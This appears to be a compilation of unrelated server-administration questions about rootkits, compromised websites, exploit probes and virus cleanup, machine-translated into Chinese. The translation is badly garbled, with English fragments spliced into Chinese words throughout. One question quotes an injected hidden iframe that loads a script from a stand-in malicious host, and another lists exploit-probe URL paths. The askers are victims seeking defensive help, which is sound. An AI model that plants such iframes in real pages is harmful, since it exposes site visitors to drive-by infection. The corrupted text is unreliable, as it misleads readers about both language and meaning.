首先,我并不是在寻找安装在服务器上的Rootkit检测软件,因为这可能并且可能行不通,尤其是在现场系统上。 我很想知道rootkit接pipe一台服务器的迹象是什么。 至less在发生什么事情的时候,可以期待和目睹什么样的损害和外在的检测行为呢? 我的想法 – 也许是错误的 – 如果你不能通过像ps , top , netstat这样的工具检测到系统的危害(根据定义,这可能会被篡改),或许可以确定系统是根植于: 不寻常的loadvg? 不寻常的磁盘IO和/或硬盘温度? 高普通出站stream量? (问题) 电子邮件退回邮件合法的MTA,以回应没有发送电子邮件? 在公共块列表上列出? (显然,我们正在谈到可以公开访问的服务器)。 我在正确的道路上 – 可以通过这种方法来识别服务器,以及如何?
我最近看了我的路由器日志。 为什么我的家庭networking中有很多请求没有发送到我的电脑? 他们看起来不像第三方广告/embedded在页面中的图像。 请求有模式,例如: top-visitor.com/look.php www.dottip.com/search/result.php?aff=8755&req=nickelodeon+games www.placeca.com/search/result.php?aff=3778&req=wireless+cell+phone www.bb5a.com/search.php?username=3348&keywords=flights www.blazerbox.com/search.php?username=2341&keywords=colorado+springs+real+estate www.freeautosource.com/search.php?username=sun100&keywords=vehicle www.1sp2.com/search.php?username=20190&keywords=las+the+hotel+vegas www.loadgeo.com/search/result.php?aff=10357&req=winamp www.exalt123.com/portal.php?ref=seo2007 www.7catalogs.com/search.php?username=la24&keywords=shutter www.theloaninstitute.com/search.php?username=kevin&keywords=webcam www.grammt.com/search.php?username=2530&keywords=bob 这些请求中有数百个在一秒之内发送。 那么发生了什么?
可能重复: 我的服务器被黑了应急 我有这个奇怪的页面,我很确定这不是我创build的: <iframe src="http://a.bad.site:8080/ts/in.cgi?pepsi106" width=125 height=125 style="visibility: hidden"></iframe> 它来自哪里? 这是一个病毒吗? 我的博客网站blog.domain.com在几个星期前还好。 但是现在突然间,当我去看我的博客时,它变成了空白页面并显示: This is index.html 任何人有任何想法如何永久删除它,并防止它再次发生在我的网站?
几年来,我第一次负责帮助PHP Web应用程序的服务器pipe理(使用Apache进行服务)。 我们看到了一些无效url的请求,我认为这些url是恶意软件/漏洞利用相关的探针。 像 r/www/cache/static/home/img/logos/nuomi_ade5465d.png cgi-bin/test.sh cgi-sys/entropysearch.cgi 等等 我想阻止这些要求,既要坚持不良的演员,更重要的是要清理我的日志。 为此,我有几个问题 一般来说,阻止IP地址工作? 我知道“互联网上的IP地址==唯一设备”已经很长时间了,但是我想知道这些探测器是否通常来自于那些对我来说安全的networking, 如果我不能阻止IP地址,有没有人维护一个坏的演员通常探测的URL列表,所以我可以通过URL阻止? Re:#2 – 如果我要在服务器级别处理这个阻塞,哪个apache模块适合这种事情? ( MOD_REWRITE , MOD_SECURITY ) 有没有更好的方法来阻止除IP或URL之外的这些请求? 此外,该系统托pipe在EC2 – 亚马逊提供这种事情的任何帮助?
这引起了我的Mac用户群体的火焰战争,但最近苹果发布的build议,然后提出build议使用防病毒产品。 我的意思是值得安全而不是遗憾,serverfault上的一般感觉是什么? 如果是,你推荐什么?
不知怎的,一些JavaScript代码被附加到我的网站上的几个索引页面的底部。 我知道这是一个木马或iframe攻击。 然而,我想知道如何才能有人能够将代码添加到我的来源? 这是IIS的安全问题吗? 他们是通过我的一个表单发布的吗? 或者我甚至不知道的其他东西。 任何在这方面的帮助,非常感谢。
我正在排除朋友的Windows 2k3文件服务器(我几周前为他们设置的)。 它受到了tenga.gen病毒的感染,现在他正试图清除它,但是手头没有服务器防病毒软件。 但是,从长远来看,build议您尝试清理服务器并清除病毒的所有痕迹,或者只是擦拭并重新安装? 通常情况下,我会build议擦拭,并从一开始就重新安装一个新的病毒扫描,并慢慢地将validation过的清洁文件移回到它上面,但是我移出了该区域,并且无法亲自进行。
我有一个名为“隐身”的进程已经感染了我的服务器(砰的一声我的CPU),我无法弄清楚它在哪里删除它的好处。 每次我杀死这个进程,它都会以某种方式再次启动… ps -ef | grep stealth ps -ef | grep stealth给我这个: 但我不知道./stealth会在哪里,因为它是一个相对path? 另外当我尝试使用locate或find ,我什么都没有得到。 任何想法如何find并删除这个过程?
由于已经有一个关于清理工具的wiki,有没有给你负面结果的工具(即使系统变得更糟)?
我最近注意到在我的系统上增加了病毒。 我们使用CA eTrust 8.1进行防病毒,所有用户都是“域用户”,因此无法在其计算机上安装任何软件。 在随机的计算机审计中,我发现恶意软件与恶意软件反恶意软件,eTrust错过了(实时扫描已打开) – 我发现.exe文件,我认为没有安装,因为似乎没有任何registry编辑。 我假设他们中的大多数来自浏览网站,因为他们似乎在IE.5文件夹中。 我能做些什么来进一步防止病毒渗入我的networking? eTrust似乎与实时扫描有很大的差别,我不完全相信安装所有的.exe文件是被禁止的(我有几个用户自己安装Chrome)。 提前致谢。